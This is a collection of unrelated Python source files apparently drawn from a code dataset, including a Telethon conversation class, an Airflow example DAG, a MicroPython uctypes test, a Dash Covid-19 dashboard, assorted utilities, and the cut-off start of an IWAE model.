timeout=None if due == float('inf') else due - time.time(),
loop=self._client.loop
)
def _cancel_all(self, exception=None):
for pending in itertools.chain(
self._pending_responses.values(),
self._pending_replies.values(),
self._pending_edits.values()):
if exception:
pending.set_exception(exception)
else:
pending.cancel()
for _, fut in self._custom.values():
if exception:
fut.set_exception(exception)
else:
fut.cancel()
async def __aenter__(self):
self._input_chat = \
await self._client.get_input_entity(self._input_chat)
self._chat_peer = utils.get_peer(self._input_chat)
# Make sure we're the only conversation in this chat if it's exclusive
chat_id = utils.get_peer_id(self._chat_peer)
count = self._client._ids_in_conversations.get(chat_id, 0)
if self._exclusive and count:
raise errors.AlreadyInConversationError()
self._client._ids_in_conversations[chat_id] = count + 1
self._client._conversations[self._id] = self
self._last_outgoing = 0
self._last_incoming = 0
for d in (
self._outgoing, self._incoming,
self._pending_responses, self._pending_replies,
self._pending_edits, self._response_indices,
self._reply_indices, self._edit_dates, self._custom):
d.clear()
if self._total_timeout:
self._total_due = time.time() + self._total_timeout
else:
self._total_due = float('inf')
return self
def cancel(self):
"""Cancels the current conversation and exits the context manager."""
raise _ConversationCancelled()
async def __aexit__(self, exc_type, exc_val, exc_tb):
chat_id = utils.get_peer_id(self._chat_peer)
if self._client._ids_in_conversations[chat_id] == 1:
del self._client._ids_in_conversations[chat_id]
else:
self._client._ids_in_conversations[chat_id] -= 1
del self._client._conversations[self._id]
self._cancel_all()
return isinstance(exc_val, _ConversationCancelled)
__enter__ = helpers._sync_enter
__exit__ = helpers._sync_exit
class _ConversationCancelled(InterruptedError):
pass
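# --- Illustrative usage sketch (not part of the module above) ---
# A Conversation is normally obtained from ``client.conversation(...)`` rather
# than constructed directly; the bot username below is a placeholder.
async def _example_conversation(client):
    async with client.conversation('@some_bot', timeout=60) as conv:
        await conv.send_message('/start')
        response = await conv.get_response()   # next incoming message in this chat
        await conv.send_message('option 1')
        await conv.get_edit(response)          # wait for the bot to edit its reply
        await conv.mark_read()                 # acknowledge everything received so far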
|
StarcoderdataPython
|
11268145
|
<gh_stars>0
"""Example DAG demonstrating the usage of the BashOperator."""
from datetime import timedelta
import airflow
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
args = {
"owner": "Airflow",
"start_date": airflow.utils.dates.days_ago(2),
}
dag = DAG(
dag_id="my_second_dag",
default_args=args,
schedule_interval="45 13 * * 1,3,5",
dagrun_timeout=timedelta(minutes=60),
)
run_this_last = DummyOperator(task_id="run_this_last", dag=dag,)
# [START howto_operator_bash]
run_this1 = BashOperator(task_id="echo_1", bash_command="echo 1", dag=dag,)
# [START howto_operator_bash]
run_this2 = BashOperator(task_id="echo_2", bash_command="echo 2", dag=dag,)
# [START howto_operator_bash]
run_this3 = BashOperator(task_id="echo_3", bash_command="echo 3", dag=dag,)
# [START howto_operator_bash]
run_this4 = BashOperator(task_id="echo4", bash_command="echo 4", dag=dag,)
# [END howto_operator_bash]
# for i in range(3):
# task = BashOperator(
# task_id='runme_' + str(i),
# bash_command='echo "{{ task_instance_key_str }}" && sleep 1',
# dag=dag,
# )
# task >> run_this
# [START howto_operator_bash_template]
also_run_this = BashOperator(
task_id="also_run_this",
bash_command='echo "run_id={{ run_id }} | dag_run={{ dag_run }}"',
dag=dag,
)
# [END howto_operator_bash_template]
run_this1 >> run_this2 >> [run_this3, run_this4] >> also_run_this
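# --- Illustrative smoke-test commands (not part of the DAG file above) ---
# The exact CLI form depends on the installed Airflow version:
#   Airflow 1.10.x:  airflow test my_second_dag echo_1 2020-01-01
#   Airflow 2.x:     airflow tasks test my_second_dag echo_1 2020-01-01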
|
StarcoderdataPython
|
5026289
|
<filename>tests/extmod/uctypes_le_addressof_field.py<gh_stars>10-100
try:
import uctypes
except ImportError:
print("SKIP")
raise SystemExit
desc = {
"f0": uctypes.UINT8 | 0,
"f1": uctypes.UINT8 | 5,
"f2": uctypes.UINT8 | 2,
"f3": (uctypes.PTR | 8, uctypes.UINT8),
"arr": (uctypes.ARRAY | 3, uctypes.UINT8 | 2),
"sub": (4, {
"b0": uctypes.UINT8 | 0,
"b1": uctypes.UINT8 | 1,
}),
}
data = bytearray(10)
start_addr = uctypes.addressof(data)
S = uctypes.struct(start_addr, desc, uctypes.LITTLE_ENDIAN)
addr = uctypes.addressof(S, "f0")
print(addr - start_addr)
addr = uctypes.addressof(S, "f1")
print(addr - start_addr)
addr = uctypes.addressof(S, "f2")
print(addr - start_addr)
addr = uctypes.addressof(S, "f3")
print(addr - start_addr)
addr = uctypes.addressof(S, "arr")
print(addr - start_addr)
addr = uctypes.addressof(S, "sub")
print(addr - start_addr)
addr = uctypes.addressof(S.sub, "b0")
print(addr - start_addr)
addr = uctypes.addressof(S.sub, "b1")
print(addr - start_addr)
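# For reference (derived from the descriptor above, not part of the original
# test): each addressof() call prints the field's byte offset as encoded in
# ``desc`` -- e.g. f0 -> 0, f1 -> 5, f2 -> 2, f3 -> 8 (the address of the
# pointer field itself), and sub.b1 -> 4 + 1 = 5.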
|
StarcoderdataPython
|
8065812
|
<filename>iotsim/behaviors.py<gh_stars>0
from .core import Behavior
from itertools import repeat, count
class FlatlineBehavior(Behavior):
def __init__(self, name, level=None):
super().__init__(name, level=level)
def activate(self, assembly_context=None):
self.update_parameters(assembly_context=assembly_context)
return repeat(self._parameters['level'])
class LinearBehavior(Behavior):
def __init__(self, name, bias=None, increment=None):
super().__init__(name, bias=bias, increment=increment)
def activate(self, assembly_context=None):
self.update_parameters(assembly_context=assembly_context)
return (self._parameters['bias'] + self._parameters['increment'] * (i + 1)
for i in count())
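# --- Illustrative usage sketch (not part of the module above) ---
# Behaviors return infinite generators, so consumers typically take a bounded
# slice. This assumes the Behavior base class (from .core) stores the keyword
# arguments in ``self._parameters``, as the expressions above suggest.
if __name__ == "__main__":
    from itertools import islice
    ramp = LinearBehavior("temperature", bias=20.0, increment=0.5)
    print(list(islice(ramp.activate(), 5)))   # expected: [20.5, 21.0, 21.5, 22.0, 22.5]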
|
StarcoderdataPython
|
1659363
|
<reponame>jcfr/SlicerPipelines
import abc
import collections
from os import stat
PipelineProgress = collections.namedtuple("PipelineProgress",
"progress currentPipelinePieceName currentPipelinePieceNumber numberOfPieces")
class PipelineInterface(abc.ABC):
@staticmethod
@abc.abstractmethod
def GetName():
pass
@staticmethod
@abc.abstractmethod
def GetParameters():
pass
@staticmethod
@abc.abstractmethod
def GetInputType():
pass
@staticmethod
@abc.abstractmethod
def GetOutputType():
pass
@staticmethod
@abc.abstractmethod
def GetDependencies():
pass
@abc.abstractmethod
def Run(self, inputNode):
pass
@abc.abstractmethod
def SetProgressCallback(self, cb):
pass
class ProgressablePipeline(PipelineInterface):
def __init__(self):
super().__init__()
self._progressCallback = None
def SetProgressCallback(self, cb):
if (cb is not None and not callable(cb)):
raise TypeError("cb is not callable or None")
self._progressCallback = cb
@staticmethod
@abc.abstractmethod
def GetNumberOfPieces():
pass
def _Progress(self, moduleName, currentPipelinePieceNumber):
if self._progressCallback:
self._progressCallback(PipelineProgress(
progress=currentPipelinePieceNumber / self.GetNumberOfPieces(),
currentPipelinePieceName=moduleName,
currentPipelinePieceNumber=currentPipelinePieceNumber+1,
numberOfPieces=self.GetNumberOfPieces(),
))
class SinglePiecePipeline(ProgressablePipeline):
def __init__(self):
ProgressablePipeline.__init__(self)
@staticmethod
def GetNumberOfPieces():
return 1
@abc.abstractmethod
def _RunImpl(self, inputNode):
pass
def Run(self, inputNode):
self._Progress(self.GetName(), 0)
output = self._RunImpl(inputNode)
self._Progress(self.GetName(), 1)
return output
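# --- Illustrative subclass sketch (not part of the module above) ---
# A concrete single-step pipeline only has to fill in the abstract static
# methods and _RunImpl; the node type strings below are placeholders.
class IdentityPipeline(SinglePiecePipeline):
    @staticmethod
    def GetName():
        return "Identity"
    @staticmethod
    def GetParameters():
        return []
    @staticmethod
    def GetInputType():
        return "vtkMRMLModelNode"   # placeholder type name
    @staticmethod
    def GetOutputType():
        return "vtkMRMLModelNode"   # placeholder type name
    @staticmethod
    def GetDependencies():
        return []
    def _RunImpl(self, inputNode):
        # a real piece would transform the node here; this one passes it through
        return inputNode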
|
StarcoderdataPython
|
8042700
|
<gh_stars>0
import mock
import tempfile
import os
from zocalo_dls.wrapper.generic import (
ProcessRegisterWrapper,
TargetProcessRegisterWrapper,
)
@mock.patch("workflows.recipe.RecipeWrapper")
@mock.patch("procrunner.run")
def test_process_wrapper(mock_runner, mock_wrapper):
mock_runner.return_value = {"runtime": 5.0, "exitcode": 0}
command = ["ls"]
fh = tempfile.NamedTemporaryFile()
fh_log = tempfile.NamedTemporaryFile()
params = {"wrapped_commands": command, "filename": fh.name, "logname": fh_log.name}
mock_wrapper.recipe_step = {"job_parameters": params}
mock_wrapper.recwrap.send_to.return_value = None
wrapper = ProcessRegisterWrapper()
wrapper.set_recipe_wrapper(mock_wrapper)
wrapper.run()
mock_runner.assert_called_with(command)
p, f = os.path.split(fh.name)
payload = {"file_path": p, "file_name": f, "file_type": "Result"}
pl, fl = os.path.split(fh_log.name)
payloadl = {"file_path": pl, "file_name": fl, "file_type": "Log"}
mes = "result-individual-file"
calls = [mock.call(mes, payload), mock.call(mes, payloadl)]
mock_wrapper.send_to.assert_has_calls(calls)
@mock.patch("workflows.recipe.RecipeWrapper")
@mock.patch("procrunner.run")
def test_target_process_wrapper(mock_runner, mock_wrapper):
mock_runner.return_value = {"runtime": 5.0, "exitcode": 0}
command = ["ls"]
target_file = "/test.nxs"
fh = tempfile.NamedTemporaryFile()
fh_log = tempfile.NamedTemporaryFile()
params = {"wrapped_commands": command, "filename": fh.name, "logname": fh_log.name}
mock_wrapper.recipe_step = {"job_parameters": params}
mock_wrapper.recwrap.send_to.return_value = None
pay = {"target_file": target_file}
mock_wrapper.payload = pay
res_com = [command[0], target_file]
wrapper = TargetProcessRegisterWrapper()
wrapper.set_recipe_wrapper(mock_wrapper)
wrapper.run()
mock_runner.assert_called_with(res_com)
p, f = os.path.split(fh.name)
payload = {"file_path": p, "file_name": f, "file_type": "Result"}
p2 = {"target_file": fh.name}
m2 = "result-primary"
pl, fl = os.path.split(fh_log.name)
payloadl = {"file_path": pl, "file_name": fl, "file_type": "Log"}
mes = "result-individual-file"
calls = [mock.call(mes, payload), mock.call(m2, p2), mock.call(mes, payloadl)]
mock_wrapper.send_to.assert_has_calls(calls)
|
StarcoderdataPython
|
9629888
|
<gh_stars>0
#!/usr/bin/env python3
#
######################
# Covid-19 Stats App #
######################
#
# BY: Chadless1
#
# Description: Pulls data from the nytimes GitHub repository and uses Dash to display charts and graphs
# analyzing the data by the US and each individual state
#
import pandas as pd
import numpy as np
import datetime
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
# Read csv file from github
# State Data
url = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-states.csv'
df_states = pd.read_csv(url)
# Read csv file from github
# County Data
#state Codes
us_state_abbrev = {
'Alabama': 'AL',
'Alaska': 'AK',
'American Samoa': 'AS',
'Arizona': 'AZ',
'Arkansas': 'AR',
'California': 'CA',
'Colorado': 'CO',
'Connecticut': 'CT',
'Delaware': 'DE',
'District of Columbia': 'DC',
'Florida': 'FL',
'Georgia': 'GA',
'Guam': 'GU',
'Hawaii': 'HI',
'Idaho': 'ID',
'Illinois': 'IL',
'Indiana': 'IN',
'Iowa': 'IA',
'Kansas': 'KS',
'Kentucky': 'KY',
'Louisiana': 'LA',
'Maine': 'ME',
'Maryland': 'MD',
'Massachusetts': 'MA',
'Michigan': 'MI',
'Minnesota': 'MN',
'Mississippi': 'MS',
'Missouri': 'MO',
'Montana': 'MT',
'Nebraska': 'NE',
'Nevada': 'NV',
'New Hampshire': 'NH',
'New Jersey': 'NJ',
'New Mexico': 'NM',
'New York': 'NY',
'North Carolina': 'NC',
'North Dakota': 'ND',
'Northern Mariana Islands':'MP',
'Ohio': 'OH',
'Oklahoma': 'OK',
'Oregon': 'OR',
'Pennsylvania': 'PA',
'Puerto Rico': 'PR',
'Rhode Island': 'RI',
'South Carolina': 'SC',
'South Dakota': 'SD',
'Tennessee': 'TN',
'Texas': 'TX',
'Utah': 'UT',
'Vermont': 'VT',
'Virgin Islands': 'VI',
'Virginia': 'VA',
'Washington': 'WA',
'West Virginia': 'WV',
'Wisconsin': 'WI',
'Wyoming': 'WY'
}
url2 = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv'
df = pd.read_csv(url2)
# Filter for last date
today = df['date'].iloc[-1]
df = df[df['date'] == today]
df = df.replace(us_state_abbrev)
df = df.groupby('state')['cases'].sum()
# Plot
fig = px.choropleth(df, locations=df.index,
scope='usa',
color='cases',
locationmode='USA-states',
range_color=(0,1000000),
title='Cases per State',
)
# Create Date objects
df_states['date'] = pd.to_datetime(df_states['date'])
date = df_states['date'].iloc[-1]
date = date.strftime('%m-%d-%Y')
############
# Dash App #
############
app = dash.Dash(__name__)
# Layout
app.layout = html.Div(children=[
# Header image and title
html.Header(
html.Div([
html.Img(src=app.get_asset_url('c19.jpeg')),
html.H1('Covid-19 Data'),
],className='head')
),
html.Br(),
# Intro / Date / Links
html.P('Data on Covid-19 Case Numbers and Deaths for the United States. Search by State and find out more about your area.'),
html.P('Data is currently valid from *{}*'.format(date)),
html.A('data source', href='https://github.com/nytimes/covid-19-data/'),
html.Br(),
html.A('code source', href='https://github.com/chadless1/c19-stats-app/'),
# Line break
html.Br(),
html.Hr(),
html.Br(),
# Tabs
dcc.Tabs(id="tabs", value='tab-1', children=[
dcc.Tab(label='USA', value='tab-1'),
dcc.Tab(label='Data By State', value='tab-2'),
], style={'width': '90%', 'margin': 'auto', 'box-shadow': '0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24)'}, colors={'border': 'grey', 'background': '#082255', 'primary': 'black'}),
    # Tab content
html.Div(id='tabs-content'),
]) # main div tag
# End of app layout
###########################################################
# CallBacks #
###########################################################
# Tab Callbacks
@app.callback(Output('tabs-content', 'children'),
[Input('tabs', 'value')])
def render_content(tab):
# US Case and Death Calculations
today = df_states['date'].iloc[-1]
df_usa = df_states[df_states['date'] == today]
usa_total_cases = df_usa['cases'].sum()
usa_total_deaths = df_usa['deaths'].sum()
usa_total_df = df_states[['cases','deaths']].groupby(df_states['date'])
usa_total_df = usa_total_df.sum()
usa_last = usa_total_df.tail()
    # Calculate % change in cases and deaths
usa_case_percent = (usa_total_df['cases'].iloc[-1] - usa_total_df['cases'].iloc[-5]) / usa_total_df['cases'].iloc[-5] * 100
usa_case_percent = round(usa_case_percent, 2)
usa_death_percent = (usa_total_df['deaths'].iloc[-1] - usa_total_df['deaths'].iloc[-5]) / usa_total_df['deaths'].iloc[-5] * 100
usa_death_percent = round(usa_death_percent, 2)
# New df for graphs
dff = df_states.groupby('date')[['cases', 'deaths']].sum()
dff = dff.diff()
dff = dff.fillna(0)
dff_tail = dff.tail()
# Tab 1
if tab == 'tab-1':
return html.Div([
html.Div([
html.Br(),
html.H3('USA Data'),
html.Br(),
] ,className='row'),
# Main Div
html.Div([
# USA Cases
html.Div([
html.H4('Total Cases'),
html.H3('{:,}'.format(usa_total_cases)),
],className='four columns'),
# USA Deaths
html.Div([
html.H4('Total Deaths'),
html.H3('{:,}'.format(usa_total_deaths)),
],className='four columns'),
# Choropleth map
html.Div([
dcc.Graph(figure=fig),
],className='twelve columns'),
# USA Case Change
html.Div([
html.H4('Case Change %'),
html.H3('{:,}%'.format(usa_case_percent)),
html.P('over last 5 Days'),
],className='four columns'),
# USA Death Change
html.Div([
html.H4('Death Change %'),
html.H3('{:,}%'.format(usa_death_percent)),
html.P('over last 5 Days'),
],className='four columns'),
]),
html.Br(),
# Graphs
html.Div([
dcc.Graph(
figure={
'data': [
{'x': dff.index, 'y': dff['cases'].values, 'type': 'line', 'name': 'cases'},
{'x': dff.index, 'y': dff['deaths'].values, 'type': 'line', 'name': 'deaths'},
],
'layout': {
'title': 'Cases & Deaths',
#'height': 310,
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
),
],className='five columns'),
html.Div([
dcc.Graph(
figure={
'data': [
{'x': dff_tail.index, 'y': dff_tail['cases'].values, 'type': 'bar', 'name': 'cases'},
],
'layout': {
'title': 'Cases Last 5 Days',
#'height': 310,
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
),
],className='five columns'),
html.Div([
dcc.Graph(
figure={
'data': [
{'x': dff_tail.index, 'y': dff_tail['deaths'].values, 'type': 'bar', 'name': 'deaths', 'marker': {'color': 'orange'}},
],
'layout': {
'title': 'Deaths Last 5 Days',
#'height': 310,
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
),
],className='five columns'),
],className='container')
#########################################################
# End Tab1
elif tab == 'tab-2':
return html.Div([
# Tab 2 Content #
#################
# States
html.H3('Select State'),
html.Div([
dcc.Dropdown(id='my-dropdown2',
options=[{'label': i, 'value': i} for i in sorted(df_states['state'].unique())],
#multi=True,
value='Massachusetts',
searchable=False,
),
], style={'margin': 'auto', 'width': '50%', 'text-align': 'center', 'color': 'black'}),
html.Br(),
# Radio Button Graph
html.Div([
dcc.RadioItems(id='r_button',
options=[
{'label': 'Cases', 'value': 'CASES'},
{'label': 'Deaths', 'value': 'DEATH'},
{'label': 'Both', 'value': 'BOTH'}
],
value='BOTH',
labelStyle={'display': 'inline-block', 'margin-bottom': '10px', 'padding': '5px 5px'}
)
],className='row', style={'text-align': 'left', 'margin-left': '90px'}),
# Main Content Div
html.Div([
# graph div
html.Div([
dcc.Graph(id='graph_1')
],className='six columns'),
# Data div
html.Div([
html.Div(id='total_cases'),
],className='six columns'),
# second graph div
html.Div([
dcc.Graph(id='graph_2')
],className='twelve columns'),
],className='container'),
])# end of Tab 2
##########################################################
# State Graphs Callback and Functions
# Case Graph
@app.callback(Output('graph_1', 'figure'),
[Input('my-dropdown2', 'value'), Input('r_button', 'value')])
def update_figure(value, button):
if button == 'BOTH':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
figure={
'data': [
{'x': df4.index, 'y': df4, 'type': 'line', 'name': 'cases'},
{'x': df5.index, 'y': df5, 'type': 'line', 'name': 'deaths'},
],
'layout': {
'title': 'Cases & Deaths',
'height': 310,
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
return(figure)
elif button == 'CASES':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
figure={
'data': [
{'x': df4.index, 'y': df4, 'type': 'line', 'name': 'cases'},
],
'layout': {
'title': 'Cases',
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
return(figure)
elif button == 'DEATH':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
figure={
'data': [
{'x': df5.index, 'y': df5, 'type': 'line', 'name': 'deaths', 'marker': {'color': 'orange'}},
],
'layout': {
'title': 'Deaths',
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
return(figure)
@app.callback(Output('total_cases', 'children'),
[Input('my-dropdown2', 'value')])
def update_content(value):
# New DataFrame
dff = df_states[df_states['state'] == value]
# Case and Death Totals
t_cases = dff['cases'].iloc[-1]
t_deaths = dff['deaths'].iloc[-1]
# Case Calculations
dff2 = dff.set_index('date')
dff2 = dff2['cases'].diff()
dff2 = dff2.dropna()
average_cases = dff2.mean()
average_cases = round(average_cases)
case_percent = (dff['cases'].iloc[-1] - dff['cases'].iloc[-5]) / dff['cases'].iloc[-5] * 100
case_percent = round(case_percent, 2)
month_cases = (dff['cases'].iloc[-1] - dff['cases'].iloc[-30]) / dff['cases'].iloc[-30] * 100
month_cases = round(month_cases, 2)
average_5_cases = dff2.tail()
average_5_cases = round(average_5_cases.mean())
average_30_cases = dff2.tail(30)
average_30_cases = round(average_30_cases.mean())
# Death Calculations
dff3 = dff.set_index('date')
dff3 = dff3['deaths'].diff()
dff3 = dff3.dropna()
average_deaths = dff3.mean()
average_deaths = round(average_deaths)
death_percent = (dff['deaths'].iloc[-1] - dff['deaths'].iloc[-5]) / dff['deaths'].iloc[-5] * 100
death_percent = round(death_percent, 2)
month_deaths = (dff['deaths'].iloc[-1] - dff['deaths'].iloc[-30]) / dff['deaths'].iloc[-30] * 100
month_deaths = round(month_deaths, 2)
average_5_deaths = dff3.tail()
average_5_deaths = round(average_5_deaths.mean())
average_30_deaths = dff3.tail(30)
average_30_deaths = round(average_30_deaths.mean())
return(
# HTML TABLE
html.Table([
html.Tr([
# Headers
html.Th(' '),
html.Th('Cases'),
html.Th('Deaths'),
] ),
html.Tr([
#Total
html.Td('Total:'),
html.Td('{:,}'.format(t_cases)),
html.Td('{:,}'.format(t_deaths)),
] ),
html.Tr([
#Average per day
html.Td('Daily Average:'),
html.Td('{:,}'.format(average_cases)),
html.Td('{:,}'.format(average_deaths)),
] ),
html.Tr([
# Average 5 Days
html.Td('Average Last 5 Days:'),
html.Td('{:,}'.format(average_5_cases)),
html.Td('{:,}'.format(average_5_deaths)),
] ),
html.Tr([
# Average 30 Days
html.Td('Average Last 30 Days:'),
html.Td('{:,}'.format(average_30_cases)),
html.Td('{:,}'.format(average_30_deaths)),
] ),
html.Tr([
# Change 5 Days
html.Td('% Change 5 Days:'),
html.Td('{:,}%'.format(case_percent)),
html.Td('{:,}%'.format(death_percent)),
] ),
html.Tr([
#Change 30 Days
html.Td('% Change 30 Days:'),
html.Td('{:,}%'.format(month_cases)),
html.Td('{:,}%'.format(month_deaths)),
] ),
] ),
)
# Graph 2
@app.callback(Output('graph_2', 'figure'),
[Input('my-dropdown2', 'value'), Input('r_button', 'value')])
def update_figure_bar(value, button):
if button == 'BOTH':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
df4 = df4.tail()
df5 = df5.tail()
figure={
'data': [
{'x': df4.index, 'y': df4, 'type': 'bar', 'name': 'cases'},
{'x': df5.index, 'y': df5, 'type': 'bar', 'name': 'deaths'},
],
'layout': {
'title': 'Last 5 Days',
                    'height': 300,
                    'xaxis': {'tickformat': '%b %d, %Y', 'nticks': 5},
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'}
}}
return(figure)
elif button == 'CASES':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
df4 = df4.tail()
figure={
'data': [
{'x': df4.index, 'y': df4, 'type': 'bar', 'name': 'cases'},
{'x': df4.index, 'y': df4, 'type': 'line', 'marker': {'color': 'black'}},
],
'layout': {
'title': 'Cases Last 5 Days',
                    'xaxis': {'tickformat': '%b %d, %Y', 'nticks': 5},
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'}
}}
return(figure)
elif button == 'DEATH':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
df5 = df5.tail()
figure={
'data': [
{'x': df5.index, 'y': df5, 'type': 'bar', 'name': 'deaths', 'marker': {'color': 'orange'}},
{'x': df5.index, 'y': df5, 'type': 'line', 'marker': {'color': 'black'}},
],
'layout': {
'title': 'Deaths Last 5 Days',
                    'xaxis': {'tickformat': '%b %d, %Y', 'nticks': 5},
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'}
}}
return(figure)
########################################################
app.config.suppress_callback_exceptions=True
server = app.server
if __name__ == '__main__':
app.run_server(debug=True)
|
StarcoderdataPython
|
11305933
|
<reponame>miguelbravo7/frontur_excel_addin
from setuptools import setup, find_namespace_packages
with open("README.md", 'r') as f:
long_description = f.read()
with open("requirements.txt", 'r') as f:
requirements = f.read().splitlines()
setup(
name="fronTur_excel_addin",
author="<NAME>",
author_email="<EMAIL>",
description="Trabajo de fin de grado",
long_description=long_description,
long_description_content_type="text/markdown",
version="0.2.0",
packages=find_namespace_packages(),
include_package_data=True,
install_requires=['docutils'] + requirements,
keywords="TFG ULL ISTAC",
url="http://example.com/HelloWorld/",
project_urls={
"Documentation": "https://github.com/miguelbravo7/frontur_excel_addin#frontur_excel_addin",
"Source Code": "https://github.com/miguelbravo7/frontur_excel_addin",
},
classifiers=[
"License :: OSI Approved :: BSD License",
'Operating System :: Microsoft :: Windows',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries',
'Topic :: Scientific/Engineering :: Information Analysis',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'
],
python_requires='>=3.7'
)
|
StarcoderdataPython
|
8128071
|
<reponame>mtravis/UK-Polling-Stations
from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "E07000135"
addresses_name = "local.2019-05-02/Version 1/Democracy_Club__02May2019OW.CSV"
stations_name = "local.2019-05-02/Version 1/Democracy_Club__02May2019OW.CSV"
elections = ["local.2019-05-02"]
def address_record_to_dict(self, record):
rec = super().address_record_to_dict(record)
uprn = record.property_urn.strip().lstrip("0")
if uprn in [
"100030582044", # LE22DB -> LE25DB : 36-38 Bankart Avenue, Oadby, Leicester
"200001140229", # LE25AW -> LE24LZ : Flat 1 St Pauls Court, Chapel Street, Oadby, Leicester
"200001140230", # LE25AW -> LE24LZ : Flat 2 St Pauls Court, Chapel Street, Oadby, Leicester
"200001140231", # LE25AW -> LE24LZ : Flat 3 St Pauls Court, Chapel Street, Oadby, Leicester
"200001140232", # LE25AW -> LE24LZ : Flat 4 St Pauls Court, Chapel Street, Oadby, Leicester
"200001140233", # LE25AW -> LE24LZ : Flat 5 St Pauls Court, Chapel Street, Oadby, Leicester
"10010147237", # LE25QP -> LE182LE : 9 Honeywell Close, Oadby, Leicester
"10010147209", # LE183QH -> LE181DZ : 12A Waterloo Crescent, Wigston, Leicestershire
]:
rec["accept_suggestion"] = False
return rec
|
StarcoderdataPython
|
4956223
|
from lbclassifier import LexiconBasedClassifier
# Lexicon
lexicon = {
"positive": [
{ "term": "excellent", "weight": 1.0 },
{ "term": "good", "weight": 0.7 }
],
"negative": [
{ "term": "horrible", "weight": 1.0 },
{ "term": "bad", "weight": 0.8 }
],
}
# Documents to classify
raw_documents = [
'This book is excellent',
'This book is horrible',
]
# Ordered labels (only necessary if the order is different from the lexicon)
labels = [ "positive", "negative" ]
# Create the classifier
classifier = LexiconBasedClassifier(lexicon, labels=labels)
# Predict the labels index of a dataset
predict = classifier.predict(raw_documents)
print(predict)
# Predict the labels of a dataset
predict_labels = classifier.predict_labels(raw_documents)
print(predict_labels)
# Predict with probabilities for a dataset
predict_proba = classifier.predict_proba(raw_documents)
print(predict_proba)
# Predict with labels and probabilities for a dataset
predict_proba_labels = classifier.predict_proba_labels(raw_documents)
print(predict_proba_labels)
# Predict the label index of a single instance
predict_single = classifier.predict_single(raw_documents[0])
print(predict_single)
# Predict the label of a single instance
predict_single_label = classifier.predict_single_label(raw_documents[0])
print(predict_single_label)
# Predict with probabilities for a single instance
predict_proba_single = classifier.predict_proba_single(raw_documents[0])
print(predict_proba_single)
# Predict with labels and probabilities for a single instance
predict_proba_single_label = classifier.predict_proba_single_label(raw_documents[0])
print(predict_proba_single_label)
|
StarcoderdataPython
|
3314349
|
<filename>ALDS/ALDS1_9_C_using_heapq.py<gh_stars>1-10
import sys
import io
sys.stdin = open("ALDS1_9_C_in4.txt", 'r')
#tmp = input()
# copy the below part and paste to the submission form.
# ---------function------------
import sys
import heapq
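# heapq implements a min-heap, so priorities are pushed negated below;
# popping then returns the largest key first (extractMax behaviour)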
nodes = []
outputs = [None] * 2000000
_num_outputs = 0
calc_time = True
if calc_time:import time
def main():
global _num_outputs
if calc_time: start = time.time()
commands = sys.stdin.readlines()
for command in commands:
if command[0] == 'i':
#heapq.heappush(nodes, Node(int(command[7:])))
heapq.heappush(nodes, -(int(command[7:])))
elif command[1] == 'x':
outputs[_num_outputs] = -heapq.heappop(nodes)
_num_outputs += 1
elif command[1] == 'n':
break
if calc_time: print(time.time() - start)
for i in range(_num_outputs):
#print(outputs[i])
pass
return
main()
# -----------------------------
sys.stdin = sys.__stdin__
|
StarcoderdataPython
|
9742087
|
<gh_stars>0
from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
import tensorflow_probability as tfp
import datetime
import os, sys
from argparse import ArgumentParser
# Debug module
# from tensorflow.python import debug as tf_debug
import numpy as np
import warnings
from keras.datasets import mnist
from tensorflow.python.summary.writer.writer import FileWriter
import matplotlib.pyplot as plt
warnings.simplefilter('error', UserWarning)
class IWAE:
def __init__(self, input_shape, batch_size, layer_specs, k_samples, lr, sess, small):
self.data_ph = tf.placeholder(dtype=tf.float32, shape=(None, k_samples, input_shape))
self.train_ph = tf.placeholder(dtype=tf.bool)
self.tot_obj_loss = tf.placeholder(dtype=tf.float32)
self.log2pi = tf.log(2 * np.pi)
self.q_probs = []
self.h_units = layer_specs
self.batch_size = batch_size
self.small = small
self.init = tf.placeholder(dtype=tf.bool)
        self.k = k_samples
